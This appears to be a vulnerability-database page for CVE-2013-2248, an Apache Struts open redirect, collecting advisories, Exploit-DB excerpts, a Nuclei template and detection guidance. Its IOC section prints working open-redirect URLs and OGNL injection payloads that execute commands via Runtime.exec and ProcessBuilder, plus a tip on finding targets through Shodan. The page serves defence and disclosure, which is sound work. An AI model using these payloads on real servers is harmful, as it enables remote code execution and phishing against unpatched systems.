CVE-2013-2248
published 2013-07-20CVE-2013-2248: Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct…
PriorityP344medium5.8CVSS 2.0
AVNACMAuNCPIPAN
EXPLOIT
EPSS
94.65%
99.8th percentile
Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
Affected
44 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/index.action?redirect:http://www.interact.sh/
urlhttp://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/↗
urlhttp://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23↗
urlhttp://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}↗
urlhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}↗
urlhttp://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}↗
command%{#_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime().exec('your commands')}↗
command%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),@java.lang.Runtime@getRuntime().exec('your commands')}↗
yara
regex: '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
- →Detect exploitation attempts by inspecting HTTP request parameters for the 'redirect:' or 'redirectAction:' prefixes in query strings or request bodies targeting any .action endpoint. ↗
- →Both %{expr} and ${expr} OGNL expression notation can be used in the redirect: / redirectAction: parameter values; filter for both patterns. ↗
- →Attack payloads may appear in both the query string and the HTTP request body; inspect both locations for redirect:/redirectAction: prefixed parameters. ↗
- →A successful exploit produces an HTTP 302 response with a Location header pointing to an attacker-controlled URL; monitor for 302 responses from .action endpoints where Location does not match the application's own domain. ↗
- →All Struts2 applications using DefaultActionMapper are vulnerable; fingerprint targets via Shodan/FOFA queries for 'apache struts', 'struts2 showcase', or 'struts problem report' in HTTP responses.
- →ProcessBuilder-based OGNL payloads (new java.lang.ProcessBuilder) in redirect: parameters indicate active RCE exploitation beyond simple open redirect; alert on this string in HTTP parameters. ↗
- ·The action: prefix can only be used for attacks if wildcard mapping is enabled in the Struts2 configuration; redirect: and redirectAction: are not constrained by configuration and are universally exploitable. ↗
- ·After upgrading to 2.3.15.1+, redirect: and redirectAction: parameters are completely dropped and will no longer function; this may break existing application functionality relying on these prefixes. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Open redirect in Apache Struts
osv·2022-05-17
CVE-2013-2248 [MEDIUM] Open redirect in Apache Struts
Open redirect in Apache Struts
The Struts 2 DefaultActionMapper used to support a method for short-circuit navigation state changes by prefixing parameters with "redirect:" or "redirectAction:", followed by a desired redirect target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. Attackers could use this to redirect to arbitrary web sites and conduct phishing attacks.
In Struts 2 before 2.3.15.1 the information following "redirect:" or "redirectAction:" can easily be manipulated to redirect to an arbitrary location.
GHSA
Open redirect in Apache Struts
ghsa·2022-05-17
CVE-2013-2248 [MEDIUM] CWE-20 Open redirect in Apache Struts
Open redirect in Apache Struts
The Struts 2 DefaultActionMapper used to support a method for short-circuit navigation state changes by prefixing parameters with "redirect:" or "redirectAction:", followed by a desired redirect target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. Attackers could use this to redirect to arbitrary web sites and conduct phishing attacks.
In Struts 2 before 2.3.15.1 the information following "redirect:" or "redirectAction:" can easily be manipulated to redirect to an arbitrary location.
No detection rules found.
Exploit-DB
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
exploitdb·2014-01-14·CVSS 9.8
CVE-2013-2251 [CRITICAL] Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
Apache Struts2 2.0.0
Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
request and action to be executed on the server. DefaultActionMapper is
a default implementation of ActionMapper. It handles four types of
prefixed parameters: action:, redirect:, redirectAction: and method:.
For example, redirect prefix is used for HTTP redirect.
Normal redirect prefix usage in JSP:
...
If the cancel button is clicked, redirection is performed.
Request URI for redirection:
/foo.action?redirect:http://www.google.com/
Resopnse Header:
HTTP/1.1 302 Found
Location: http://www.google.com/
Usage of other prefixed parameters is similar to redirect.
See Struts2 document for details.
https://cwiki.apache.org/confluence/display/WW/ActionMapper
As stated already, there are four
Exploit-DB
Apache Struts 2.2.3 - Multiple Open Redirections
exploitdb·2013-07-16
CVE-2013-2248 Apache Struts 2.2.3 - Multiple Open Redirections
Apache Struts 2.2.3 - Multiple Open Redirections
---
source: https://www.securityfocus.com/bid/61196/info
Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can leverage these issues by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Apache Struts 2.0.0 prior to 2.3.15.1 are vulnerable.
http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23
Nuclei
Apache Struts - Multiple Open Redirection Vulnerabilities
nuclei·CVSS 5.8
CVE-2013-2248 [MEDIUM] Apache Struts - Multiple Open Redirection Vulnerabilities
Apache Struts - Multiple Open Redirection Vulnerabilities
Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
Template:
id: CVE-2013-2248
info:
name: Apache Struts - Multiple Open Redirection Vulnerabilities
author: 0x_Akoko
severity: medium
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
impact: |
An attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware.
remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
reference:
- https://www.exploit-db.com/exploits/38666
- https://nvd.nist.gov/vu
http://struts.apache.org/release/2.3.x/docs/s2-017.htmlhttp://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.htmlhttp://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.htmlhttp://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.htmlhttp://www.securityfocus.com/bid/61196http://www.securityfocus.com/bid/64758http://struts.apache.org/release/2.3.x/docs/s2-017.htmlhttp://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.htmlhttp://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.htmlhttp://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.htmlhttp://www.securityfocus.com/bid/61196http://www.securityfocus.com/bid/64758
2013-07-20
Published